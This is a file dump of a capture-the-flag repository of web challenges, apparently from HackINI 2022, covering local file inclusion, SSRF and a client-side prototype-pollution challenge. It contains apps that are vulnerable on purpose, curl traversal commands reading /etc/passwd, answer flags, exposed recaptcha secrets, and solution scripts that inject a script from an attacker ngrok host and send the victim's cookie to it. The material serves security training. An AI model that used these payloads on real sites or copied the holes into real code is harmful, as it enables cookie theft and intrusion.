--------------------------------------------------------------------------------
1 | # baby lfi 2
2 |
3 | **`Author:`** [Anis Chebah](https://github.com/)
4 |
5 | ## Description
6 |
7 | > What about making things a bit harder ?
8 |
9 | ## Solution
10 |
11 | Solution of the challenge can be found [here](solution/).
12 |
--------------------------------------------------------------------------------
/web/baby-lfi-2/challenge.yml:
--------------------------------------------------------------------------------
1 | name: "baby lfi 2"
2 | author: "Anis Chebah"
3 |
4 | category: web
5 | difficulty: easy
6 |
7 | description: |
8 |   > What about making things a bit harder ?
9 | 10 | **Author :** Anis Chebah 11 | 12 | connection_info: https://baby-lfi-2.challs.shellmates.club 13 | 14 | #image: gcr.io/glowing-reserve-336013/ 15 | 16 | value: 500 17 | type: dynamic 18 | 19 | tags: 20 | - baby 21 | - php 22 | - easy 23 | 24 | extra: 25 | initial: 500 26 | decay: 15 27 | minimum: 50 28 | 29 | flags: 30 | - shellmates{yOU_M4De_yOUr_waY_7hRough_iT} 31 | 32 | state: visible 33 | 34 | version: "0.1" 35 | -------------------------------------------------------------------------------- /web/baby-lfi-2/challenge/en.php: -------------------------------------------------------------------------------- 1 | Hello there, this is a basic example, just a proof of concept ;)" ; 3 | ?> -------------------------------------------------------------------------------- /web/baby-lfi-2/challenge/fr.php: -------------------------------------------------------------------------------- 1 | Bonjour, ceci est un exemple de base, juste une preuve de concept ;)" ; 3 | ?> -------------------------------------------------------------------------------- /web/baby-lfi-2/challenge/main.css: -------------------------------------------------------------------------------- 1 | h1 { 2 | text-align: center; 3 | } 4 | .token.atrule, 5 | .token.attr-value, 6 | .token.keyword { 7 | color: #81032d; 8 | } 9 | .token.property, 10 | .token.tag, 11 | .token.boolean, 12 | .token.number, 13 | .token.constant, 14 | .token.symbol, 15 | .token.deleted { 16 | color: #6a50eb; 17 | } 18 | .token.selector, 19 | .token.attr-name, 20 | .token.string, 21 | .token.char, 22 | .token.builtin, 23 | .token.inserted { 24 | color: #ff6d48; 25 | } 26 | .token.function { 27 | color: #007580; 28 | } 29 | .code-block { 30 | border: 2px solid #393c5563; 31 | border-radius: 4px; 32 | padding-top: 4px; 33 | padding-left: 4px; 34 | } 35 | -------------------------------------------------------------------------------- /web/baby-lfi-2/docker-compose.yml: 
--------------------------------------------------------------------------------
version: '3.8'

services:

  web:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - '8080:80'
    healthcheck:
      test: curl -I --fail http://localhost/ || exit 1
      interval: 60s
      timeout: 2s
      retries: 5
--------------------------------------------------------------------------------
/web/baby-lfi-2/solution/README.md:
--------------------------------------------------------------------------------
# baby lfi 2

## Write-up

```bash
curl -v '[DOMAIN]?language=./languages/../../../../etc/passwd'
```

## Flag

`shellmates{yOU_M4De_yOUr_waY_7hRough_iT}`

--------------------------------------------------------------------------------
/web/baby-lfi/Dockerfile:
--------------------------------------------------------------------------------
FROM php:7.3-apache

RUN apt-get update

COPY ./challenge/* /var/www/html/

RUN echo "\nshellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}" >> /etc/passwd

WORKDIR /var/www/html
--------------------------------------------------------------------------------
/web/baby-lfi/README.md:
--------------------------------------------------------------------------------
# baby lfi

**`Author:`** [Anis Chebah](https://github.com/)

## Description

> What is LFI ?

## Solution

Solution of the challenge can be found [here](solution/).

--------------------------------------------------------------------------------
/web/baby-lfi/challenge.yml:
--------------------------------------------------------------------------------
name: "baby lfi"
author: "Anis Chebah"

category: web
difficulty: easy

description: |
  > What is LFI ?

  **Author :** Anis Chebah

connection_info: https://baby-lfi.challs.shellmates.club


value: 500
type: dynamic
tags:
  - baby
  - php
  - easy

extra:
  initial: 500
  decay: 15
  minimum: 50

flags:
  - shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}

state: visible

version: "0.1"

--------------------------------------------------------------------------------
/web/baby-lfi/challenge/en.php:
--------------------------------------------------------------------------------
<?php
echo "<pre>Hello there, this is a basic example, just a proof of concept ;)</pre>" ;
?>
--------------------------------------------------------------------------------
/web/baby-lfi/challenge/fr.php:
--------------------------------------------------------------------------------
<?php
echo "<pre>Bonjour, ceci est un exemple de base, juste une preuve de concept ;)</pre>" ;
?>
--------------------------------------------------------------------------------
/web/baby-lfi/challenge/main.css:
--------------------------------------------------------------------------------
h1 {
  text-align: center;
}
.token.atrule,
.token.attr-value,
.token.keyword {
  color: #81032d;
}
.token.property,
.token.tag,
.token.boolean,
.token.number,
.token.constant,
.token.symbol,
.token.deleted {
  color: #6a50eb;
}
.token.selector,
.token.attr-name,
.token.string,
.token.char,
.token.builtin,
.token.inserted {
  color: #ff6d48;
}
.token.function {
  color: #007580;
}
.code-block {
  border: 2px solid #393c5563;
  border-radius: 4px;
  padding-top: 4px;
  padding-left: 4px;
}

--------------------------------------------------------------------------------
/web/baby-lfi/docker-compose.yml:
--------------------------------------------------------------------------------
version: '3.8'

services:

  web:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - '8080:80'
    healthcheck:
      test: curl -I --fail http://localhost/ || exit 1
      interval: 60s
      timeout: 2s
      retries: 5
--------------------------------------------------------------------------------
/web/baby-lfi/solution/README.md:
--------------------------------------------------------------------------------
# baby lfi

## Write-up

```bash
curl -v '[DOMAIN]?language=../../../etc/passwd'
```

## Flag

`shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}`

--------------------------------------------------------------------------------
/web/challenge-creator/Dockerfile:
--------------------------------------------------------------------------------
FROM buildkite/puppeteer

COPY app /app

WORKDIR /app

RUN npm install

RUN useradd ctf

USER ctf

ENTRYPOINT ["npm", "start"]

--------------------------------------------------------------------------------
/web/challenge-creator/README.md:
--------------------------------------------------------------------------------
# Challenge creator

**`Author:`** [chenx3n](https://github.com/malikDaCoda)

## Description

> Check out my latest project: Challenge creator!
> It's still in early phase, so the code might look a little dirty.

**Note :** Flag is stored in the admin's browser cookie

**Link :**

## Solution

Solution of the challenge can be found [here](solution/).


--------------------------------------------------------------------------------
/web/challenge-creator/app/.dockerignore:
--------------------------------------------------------------------------------
node_modules

--------------------------------------------------------------------------------
/web/challenge-creator/app/.env:
--------------------------------------------------------------------------------
NODE_ENV="production"
NODE_PORT=5000
FLAG="shellmates{M4$t3r_of_cL1eNT_s1D3_hUsTL3s}"
APP_URL="https://challenge-creator.challs.shellmates.club"
RECAPTCHA_SECRET_KEY="6LcxsckfAAAAALboGz1MrKBiugzjs844dNP_BPfr"
RECAPTCHA_SITE_KEY="6LcxsckfAAAAAIngUXzlw931eegdBWErvFBPZ_K4"

--------------------------------------------------------------------------------
/web/challenge-creator/app/dev.env:
--------------------------------------------------------------------------------
NODE_ENV="development"
NODE_PORT=5000
FLAG="shellmates{test}"
APP_URL="http://localhost:5000"
RECAPTCHA_SECRET_KEY="6LcxsckfAAAAALboGz1MrKBiugzjs844dNP_BPfr"
RECAPTCHA_SITE_KEY="6LcxsckfAAAAAIngUXzlw931eegdBWErvFBPZ_K4"

--------------------------------------------------------------------------------
/web/challenge-creator/app/package.json:
--------------------------------------------------------------------------------
{
  "name": "challenge-maker",
  "version": "1.0.0",
  "description": "Challenge maker",
  "main": "index.js",
  "author": "chenx3n",
  "license": "MIT",
  "dependencies": {
    "dotenv": "^16.0.0",
    "ejs": "^3.1.7",
    "express": "^4.18.1",
    "express-csp-header": "^5.1.0",
    "express-recaptcha": "^5.1.0",
    "morgan": "^1.10.0",
    "node-fetch": "^2.6.7",
    "puppeteer": "^13.7.0"
  },
  "scripts": {
    "start": "node index.js"
  }
}

--------------------------------------------------------------------------------
/web/challenge-creator/app/visiter.js:
--------------------------------------------------------------------------------
const puppeteer = require("puppeteer");

const launchOptions = {
  args: ["--no-sandbox"],
  headless: true,
};

const env = {
  FLAG: process.env.FLAG,
};

async function visit(url) {
  const browser = await puppeteer.launch(launchOptions);
  const page = await browser.newPage();

  console.log(`[visiter.visit] Visiting '${url}'`);

  const { host } = new URL(url);

  await page.setCookie({
    name: "FLAG",
    value: env.FLAG,
    httpOnly: false,
    domain: host,
    sameSite: "Strict",
  });

  await page.goto(url, { waitUntil: "load", timeout: 10000 });

  await new Promise((resolve) => setTimeout(resolve, 5000));

  console.log(`[visiter.visit] Done visiting`);

  await page.close();
  await browser.close();
}

module.exports = { visit };

--------------------------------------------------------------------------------
/web/challenge-creator/challenge.yml:
--------------------------------------------------------------------------------
name: "Challenge creator"
author: "chenx3n"
author_link: "https://github.com/malikDaCoda"

category: web
difficulty: extreme

description: |
  > Check out my latest project: Challenge creator!
  > It's still in early phase, so the code might look a little dirty.

  **Notes :**
  - Flag is stored in the admin's browser cookie
  - Use Chrome/Chromium as a browser for better experience

  **Author :** chenx3n

connection_info: https://challenge-creator.challs.shellmates.club

image: gcr.io/glowing-reserve-336013/challenge-creator

tags:
  - extreme

value: 1000
type: dynamic

extra:
  initial: 1000
  decay: 15
  minimum: 50

flags:
  - shellmates{M4$t3r_of_cL1eNT_s1D3_hUsTL3s}

state: visible

version: "0.1"

--------------------------------------------------------------------------------
/web/challenge-creator/docker-compose.yml:
--------------------------------------------------------------------------------
version: '3.8'

services:

  web:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - '1700:5000'
    deploy:
      replicas: 1
      restart_policy:
        condition: on-failure

--------------------------------------------------------------------------------
/web/challenge-creator/solution/README.md:
--------------------------------------------------------------------------------
# Challenge creator

## Write-up (TODO)

## Flag

`shellmates{M4$t3r_of_cL1eNT_s1D3_hUsTL3s}`


--------------------------------------------------------------------------------
/web/challenge-creator/solution/evil.js:
--------------------------------------------------------------------------------
// Set your controlled website as URL
let url = "https://xxxx.ngrok.io"
let flag = encodeURIComponent(document.cookie)
let el = document.createElement("script")
el.src = `${url}/?flag=${flag}`
document.body.appendChild(el)

--------------------------------------------------------------------------------
/web/challenge-creator/solution/exploit.js:
--------------------------------------------------------------------------------
// Set your controlled website as URL
url = "https://xxxx.ngrok.io"
name = JSON.stringify(`'`)
proto = {
  tag: "script",
  attributes: {
    src: `${url}/evil.js`,
  },
  classes: []
}
payload = `{"name":${name},"value":100,"category":"web","__proto__":${JSON.stringify(proto)}}`
console.log(payload)
console.log("\n")
console.log(encodeURIComponent(payload))

--------------------------------------------------------------------------------
/web/lfi/Dockerfile:
--------------------------------------------------------------------------------
FROM php:7.3-apache

RUN apt-get update

COPY ./challenge/* /var/www/html/

RUN echo "\nshellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}" >> /etc/passwd

WORKDIR /var/www/html
--------------------------------------------------------------------------------
/web/lfi/README.md:
--------------------------------------------------------------------------------
# lfi

**`Author:`** [Anis Chebah](https://github.com/)

## Description

> We made some serious checks now, would you test it ?

## Solution

Solution of the challenge can be found [here](solution/).

--------------------------------------------------------------------------------
/web/lfi/challenge.yml:
--------------------------------------------------------------------------------
name: "lfi"
author: "Anis Chebah"

category: web
difficulty: easy

description: |
  > We made some serious checks now, would you test it ?

  **Author :** Anis Chebah

connection_info: https://lfi.challs.shellmates.club

tags:
  - easy

value: 500
type: dynamic

extra:
  initial: 500
  decay: 15
  minimum: 50

flags:
  - shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

state: visible

version: "0.1"

--------------------------------------------------------------------------------
/web/lfi/challenge/en.php:
--------------------------------------------------------------------------------
<?php
echo "<pre>Hello there, this is a basic example, just a proof of concept ;)</pre>" ;
?>
--------------------------------------------------------------------------------
/web/lfi/challenge/fr.php:
--------------------------------------------------------------------------------
<?php
echo "<pre>Bonjour, ceci est un exemple de base, juste une preuve de concept ;)</pre>" ;
?>
--------------------------------------------------------------------------------
/web/lfi/challenge/main.css:
--------------------------------------------------------------------------------
h1 {
  text-align: center;
}
.token.atrule,
.token.attr-value,
.token.keyword {
  color: #81032d;
}
.token.property,
.token.tag,
.token.boolean,
.token.number,
.token.constant,
.token.symbol,
.token.deleted {
  color: #6a50eb;
}
.token.selector,
.token.attr-name,
.token.string,
.token.char,
.token.builtin,
.token.inserted {
  color: #ff6d48;
}
.token.function {
  color: #007580;
}
.code-block {
  border: 2px solid #393c5563;
  border-radius: 4px;
  padding-top: 4px;
  padding-left: 4px;
}

--------------------------------------------------------------------------------
/web/lfi/docker-compose.yml:
--------------------------------------------------------------------------------
version: '3.8'

services:

  web:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - '8080:80'
    healthcheck:
      test: curl -I --fail http://localhost/ || exit 1
      interval: 60s
      timeout: 2s
      retries: 5
--------------------------------------------------------------------------------
/web/lfi/solution/README.md:
--------------------------------------------------------------------------------
# lfi

## Write-up

```bash
curl -v '[DOMAIN]?language=./languages/..././..././..././..././etc/passwd'
```

## Flag

`shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}`

--------------------------------------------------------------------------------
/web/nextgen-1/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:latest

RUN apt-get update && \
    DEBIAN_FRONTEND=noninteractive apt-get install -y \
    vim curl \
    apache2 libapache2-mod-wsgi-py3 \
    python3 python3-pip

RUN pip3 install flask

# TO-DO : use mod_wsgi from source code

COPY challenge/apps/ /var/www/

COPY challenge/requirements.txt /var/www/
RUN pip install -r /var/www/requirements.txt

COPY challenge/wsgi-apps.conf /etc/apache2/sites-available/
RUN a2ensite wsgi-apps && a2dissite 000-default

COPY challenge/flag.txt /flag.txt
RUN chmod 644 /flag.txt

CMD echo "127.0.0.1 hr.dep.nextgen.org acc.dep.nextgen.org">>/etc/hosts && apachectl -D FOREGROUND

--------------------------------------------------------------------------------
/web/nextgen-1/README.md:
--------------------------------------------------------------------------------
# nextGen 1

**`Author:`** [souad](https://github.com/SouadSEBAA)

## Description

> Simple monitoring app.

## Solution

Solution of the challenge can be found [here](solution/).

--------------------------------------------------------------------------------
/web/nextgen-1/challenge.yml:
--------------------------------------------------------------------------------
name: "nextGen 1"
author: "souad"

category: web
difficulty: easy

description: |
  > Simple monitoring app.

  **Note** : Flag is in the `/flag.txt` file of the web server

  **Author** : souad

connection_info: https://nextgen-1.challs.shellmates.club

tags:
  - easy/medium

value: 500
type: dynamic

extra:
  initial: 500
  decay: 8
  minimum: 50

flags:
  - shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$Rf}

state: visible

version: "0.1"

--------------------------------------------------------------------------------
/web/nextgen-1/challenge/apps/main-app/app.py:
--------------------------------------------------------------------------------
from flask import Flask, request, render_template
from urllib.request import urlopen

# acc -> accounting
# hr -> human resources

ACCOUNTING_DEP_LINK = "http://acc.dep.nextgen.org"
HR_DEP_LINK = "http://hr.dep.nextgen.org"


app = Flask(__name__)

@app.route("/")
def hello_world():
    return render_template('index.html', accLink=ACCOUNTING_DEP_LINK, hrLink=HR_DEP_LINK)

@app.route("/request", methods=['POST'])
def serve():
    with urlopen(request.form['service']) as response:
        html = response.read()
    return html

@app.errorhandler(404)
def not_found(e):
    return render_template("error-404.html"), 404

@app.errorhandler(500)
def server_error(e):
    return render_template("error-500.html"), 500

--------------------------------------------------------------------------------
/web/nextgen-1/challenge/apps/main-app/app.wsgi:
--------------------------------------------------------------------------------
#! /usr/bin/python3

import logging
import sys

logging.basicConfig(stream = sys.stderr)
sys.path.insert(0, '/var/www/main-app')

from app import app as application
--------------------------------------------------------------------------------
/web/nextgen-1/challenge/apps/main-app/static/js/main.js:
--------------------------------------------------------------------------------
function myFunc(eventObj) {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function () {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("content").innerHTML = xhttp.responseText;
    }
  };
  xhttp.open("POST", '/request');
  xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhttp.send("service=" + this.attributes.link.value);

}

var dep = document.getElementsByClassName('department');
for (var i = 0; i < dep.length; i++) {
  dep[i].addEventListener('click', myFunc);
}
--------------------------------------------------------------------------------
/web/nextgen-1/challenge/apps/main-app/templates/base.html:
--------------------------------------------------------------------------------
<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <title>
    nextGen

{% block navbar %}{% endblock navbar %}
{% block content %}{% endblock content %}

--------------------------------------------------------------------------------
/web/nextgen-1/challenge/apps/main-app/templates/error-404.html:
--------------------------------------------------------------------------------
{% extends "base.html" %}

{% block content %}

Page not found

{% endblock %}
--------------------------------------------------------------------------------
/web/nextgen-1/challenge/apps/main-app/templates/error-500.html:
--------------------------------------------------------------------------------
{% extends "base.html" %}

{% block content %}

Internal Server Error

{% endblock %}
--------------------------------------------------------------------------------
/web/nextgen-1/challenge/apps/main-app/templates/index.html:
--------------------------------------------------------------------------------
{% include "navigation.html" %}

{% block content %}

This is only first version of a control panel we want to develop to monitor company's departments.

{% endblock %}
--------------------------------------------------------------------------------
/web/nextgen-1/challenge/apps/main-app/templates/navigation.html:
--------------------------------------------------------------------------------
{% extends "base.html" %}

{% block navbar %}

22 | {% endblock %} -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/service1/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, render_template 2 | 3 | app = Flask(__name__) 4 | 5 | # Accounting department 6 | 7 | @app.route("/overview") 8 | def overview(): 9 | return render_template('summary.html') 10 | -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/service1/app.wsgi: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python3 2 | 3 | import logging 4 | import sys 5 | logging.basicConfig(stream=sys.stderr) 6 | sys.path.insert(0, '/var/www/service1') 7 | from app import app as application -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/service2/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, render_template 2 | 3 | app = Flask(__name__) 4 | 5 | # Human resources department 6 | @app.route("/overview") 7 | def overview(): 8 | return render_template('summary.html') 9 | -------------------------------------------------------------------------------- /web/nextgen-1/challenge/apps/service2/app.wsgi: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/python3 2 | 3 | import logging 4 | import sys 5 | logging.basicConfig(stream=sys.stderr) 6 | sys.path.insert(0, '/var/www/service2') 7 | from app import app as application -------------------------------------------------------------------------------- /web/nextgen-1/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$Rf} -------------------------------------------------------------------------------- /web/nextgen-1/challenge/requirements.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/challenge/requirements.txt -------------------------------------------------------------------------------- /web/nextgen-1/challenge/wsgi-apps.conf: -------------------------------------------------------------------------------- 1 | 2 | ServerName acc.dep.nextgen.org 3 | WSGIScriptAlias / /var/www/service1/app.wsgi 4 | 5 | Require all granted 6 | 7 | 8 | 9 | 10 | ServerName hr.dep.nextgen.org 11 | WSGIScriptAlias / /var/www/service2/app.wsgi 12 | 13 | Require all granted 14 | 15 | 16 | 17 | 18 | 19 | WSGIScriptAlias / /var/www/main-app/app.wsgi 20 | 21 | Require all granted 22 | 23 | 24 | -------------------------------------------------------------------------------- /web/nextgen-1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.9' 2 | services: 3 | app: 4 | build: . 
5 | ports: 6 | - "8080:80" 7 | 8 | -------------------------------------------------------------------------------- /web/nextgen-1/solution/images/cap1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/solution/images/cap1.png -------------------------------------------------------------------------------- /web/nextgen-1/solution/images/cap2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/solution/images/cap2.png -------------------------------------------------------------------------------- /web/nextgen-1/solution/images/cap3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/solution/images/cap3.png -------------------------------------------------------------------------------- /web/nextgen-1/solution/images/cap4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/solution/images/cap4.png -------------------------------------------------------------------------------- /web/nextgen-1/solution/images/cap5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/solution/images/cap5.png -------------------------------------------------------------------------------- /web/nextgen-1/solution/images/cap6.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-1/solution/images/cap6.png -------------------------------------------------------------------------------- /web/nextgen-2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt update && \ 4 | DEBIAN_FRONTEND=noninteractive apt install -y \ 5 | vim curl \ 6 | apache2 libapache2-mod-wsgi-py3 \ 7 | python3 python3-pip 8 | 9 | RUN pip3 install flask 10 | 11 | # TO-DO : use mod_wsgi from source code 12 | 13 | COPY challenge/apps/ /var/www/ 14 | 15 | COPY challenge/requirements.txt /var/www/ 16 | RUN pip install -r /var/www/requirements.txt 17 | 18 | COPY challenge/wsgi-apps.conf /etc/apache2/sites-available/ 19 | RUN a2ensite wsgi-apps && a2dissite 000-default 20 | 21 | COPY challenge/flag.txt /flag.txt 22 | RUN chmod 644 /flag.txt 23 | 24 | CMD echo "127.0.0.1 hr.dep.nextgen.org acc.dep.nextgen.org">>/etc/hosts && apachectl -D FOREGROUND -------------------------------------------------------------------------------- /web/nextgen-2/README.md: -------------------------------------------------------------------------------- 1 | # nextGen 2 2 | 3 | **`Author:`** [souad](https://github.com/SouadSEBAA) 4 | 5 | ## Description 6 | 7 | > We added some filters now. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /web/nextgen-2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "nextGen 2" 2 | author: "souad" 3 | 4 | category: web 5 | difficulty: medium 6 | 7 | description: | 8 | > We added some filters now. 
9 | 10 | **Note** : Flag is in the `/flag.txt` file of the web server 11 | 12 | **Author** : souad 13 | 14 | 15 | connection_info: https://nextgen-2.challs.shellmates.club 16 | files: 17 | - challenge/filters 18 | 19 | tags: 20 | - medium 21 | 22 | value: 500 23 | type: dynamic 24 | 25 | extra: 26 | initial: 500 27 | decay: 8 28 | minimum: 50 29 | 30 | flags: 31 | - shellmates{Y0u_d1D_1t_aG4iN_!!} 32 | 33 | state: visible 34 | 35 | version: "0.1" 36 | -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/main-app/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, render_template 2 | from urllib.request import urlopen 3 | from re import search 4 | 5 | ACCOUNTING_DEP_LINK = "http://acc.dep.nextgen.org" 6 | HR_DEP_LINK = "http://hr.dep.nextgen.org" 7 | 8 | app = Flask(__name__) 9 | 10 | @app.route("/") 11 | def hello_world(): 12 | return render_template('index.html', accLink=ACCOUNTING_DEP_LINK, hrLink=HR_DEP_LINK) 13 | 14 | @app.route("/request", methods=['POST']) 15 | def serve(): 16 | url = request.form['service'] 17 | html = '' 18 | if search(r'(localhost|127.0.0.1|0.0.0.0)', url) : 19 | html = render_template("error-404.html") 20 | else : 21 | if search(r'[a-z]+://[a-z0-9.-]+/', url): 22 | with urlopen(url) as response: 23 | html = response.read() 24 | 25 | return html 26 | 27 | @app.errorhandler(404) 28 | def not_found(e): 29 | return render_template("error-404.html"), 404 30 | 31 | @app.errorhandler(500) 32 | def server_error(e): 33 | return render_template("error-500.html"), 500 34 | -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/main-app/app.wsgi: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/python3 2 | 3 | import logging 4 | import sys 5 | 6 | logging.basicConfig(stream = sys.stderr) 7 | sys.path.insert(0, '/var/www/main-app') 8 | 9 | from app import app as application -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/main-app/static/js/main.js: -------------------------------------------------------------------------------- 1 | function myFunc(eventObj) { 2 | var xhttp = new XMLHttpRequest(); 3 | xhttp.onreadystatechange = function () { 4 | if (this.readyState == 4 && this.status == 200) { 5 | document.getElementById("content").innerHTML = xhttp.responseText; 6 | } 7 | }; 8 | xhttp.open("POST", '/request'); 9 | xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 10 | xhttp.send("service=" + this.attributes.link.value); 11 | 12 | } 13 | 14 | var dep = document.getElementsByClassName('department'); 15 | for (var i = 0; i < dep.length; i++) { 16 | dep[i].addEventListener('click', myFunc); 17 | } -------------------------------------------------------------------------------- /web/nextgen-2/challenge/apps/main-app/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | nextGen 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 |
{% block navbar %}{% endblock navbar %}
{% block content %}{% endblock content %}
--------------------------------------------------------------------------------
/web/nextgen-2/challenge/apps/main-app/templates/error-404.html:
--------------------------------------------------------------------------------
{% extends "base.html" %}

{% block content %}
Page not found
{% endblock %}
--------------------------------------------------------------------------------
/web/nextgen-2/challenge/apps/main-app/templates/error-500.html:
--------------------------------------------------------------------------------
{% extends "base.html" %}

{% block content %}
Internal Server Error
{% endblock %}
--------------------------------------------------------------------------------
/web/nextgen-2/challenge/apps/main-app/templates/index.html:
--------------------------------------------------------------------------------
{% include "navigation.html" %}

{% block content %}
This is only first version of a control panel we want to develop to monitor company's departments.
{% endblock %}
--------------------------------------------------------------------------------
/web/nextgen-2/challenge/apps/main-app/templates/navigation.html:
--------------------------------------------------------------------------------
{% extends "base.html" %}

{% block navbar %}
{% endblock %}
--------------------------------------------------------------------------------
/web/nextgen-2/challenge/apps/service1/app.py:
--------------------------------------------------------------------------------
from flask import Flask, render_template

app = Flask(__name__)

# Accounting department

@app.route("/overview")
def overview():
    return render_template('summary.html')

--------------------------------------------------------------------------------
/web/nextgen-2/challenge/apps/service1/app.wsgi:
--------------------------------------------------------------------------------
#! /usr/bin/python3

import logging
import sys
logging.basicConfig(stream=sys.stderr)
sys.path.insert(0, '/var/www/service1')
from app import app as application
--------------------------------------------------------------------------------
/web/nextgen-2/challenge/apps/service2/app.py:
--------------------------------------------------------------------------------
from flask import Flask, render_template

app = Flask(__name__)

# Human resources department
@app.route("/overview")
def overview():
    return render_template('summary.html')

--------------------------------------------------------------------------------
/web/nextgen-2/challenge/apps/service2/app.wsgi:
--------------------------------------------------------------------------------
#! /usr/bin/python3

import logging
import sys
logging.basicConfig(stream=sys.stderr)
sys.path.insert(0, '/var/www/service2')
from app import app as application
--------------------------------------------------------------------------------
/web/nextgen-2/challenge/filters:
--------------------------------------------------------------------------------
@app.route("/request", methods=['POST'])
def serve():
    url = request.form['service']
    html = ''
    if search(r'(localhost|127.0.0.1|0.0.0.0)', url) :
        html = render_template("error-404.html")
    else :
        if search(r'[a-z]+://[a-z0-9.-]+/', url):
            with urlopen(url) as response:
                html = response.read()

    return html
--------------------------------------------------------------------------------
/web/nextgen-2/challenge/flag.txt:
--------------------------------------------------------------------------------
shellmates{Y0u_d1D_1t_aG4iN_!!}
--------------------------------------------------------------------------------
/web/nextgen-2/challenge/requirements.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-2/challenge/requirements.txt
--------------------------------------------------------------------------------
/web/nextgen-2/challenge/wsgi-apps.conf:
--------------------------------------------------------------------------------
ServerName acc.dep.nextgen.org
WSGIScriptAlias / /var/www/service1/app.wsgi
Require all granted

ServerName hr.dep.nextgen.org
WSGIScriptAlias / /var/www/service2/app.wsgi
Require all granted

WSGIScriptAlias / /var/www/main-app/app.wsgi
Require all granted
--------------------------------------------------------------------------------
/web/nextgen-2/docker-compose.yml:
--------------------------------------------------------------------------------
version: '3.9'
services:
  app:
    build: .
    ports:
      - "8080:80"

--------------------------------------------------------------------------------
/web/nextgen-2/solution/images/cap1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/nextgen-2/solution/images/cap1.png
--------------------------------------------------------------------------------
/web/whois-fixed/Dockerfile:
--------------------------------------------------------------------------------
FROM php:7.3-apache

RUN apt-get update \
    && DEBIAN_FRONTEND=noninteractive apt-get -y --no-install-recommends install whois netbase

COPY challenge/ /var/www/html/

COPY flag.txt /var/www/html/thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

WORKDIR /var/www/html

RUN chown -R root:root /var/www/html
RUN chmod 444 thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
--------------------------------------------------------------------------------
/web/whois-fixed/README.md:
--------------------------------------------------------------------------------
# Whois

**`Author:`** [souad](https://github.com/SouadSEBAA)

## Description

> A web-based Whois service.

## Solution

Solution of the challenge can be found [here](solution/).

--------------------------------------------------------------------------------
/web/whois-fixed/challenge.yml:
--------------------------------------------------------------------------------
name: "Whois fixed"
author: "souad"
author_link: "https://github.com/SouadSEBAA"

category: web
difficulty: medium

description: |
  > A web-based Whois service
  > **Note** : There was a problem with the first version, this is the fixed version.
  **Author :** souad

connection_info: https://whois-fixed.challs.shellmates.club

tags:
  - medium

value: 500
type: dynamic

extra:
  initial: 500
  decay: 15
  minimum: 50

flags:
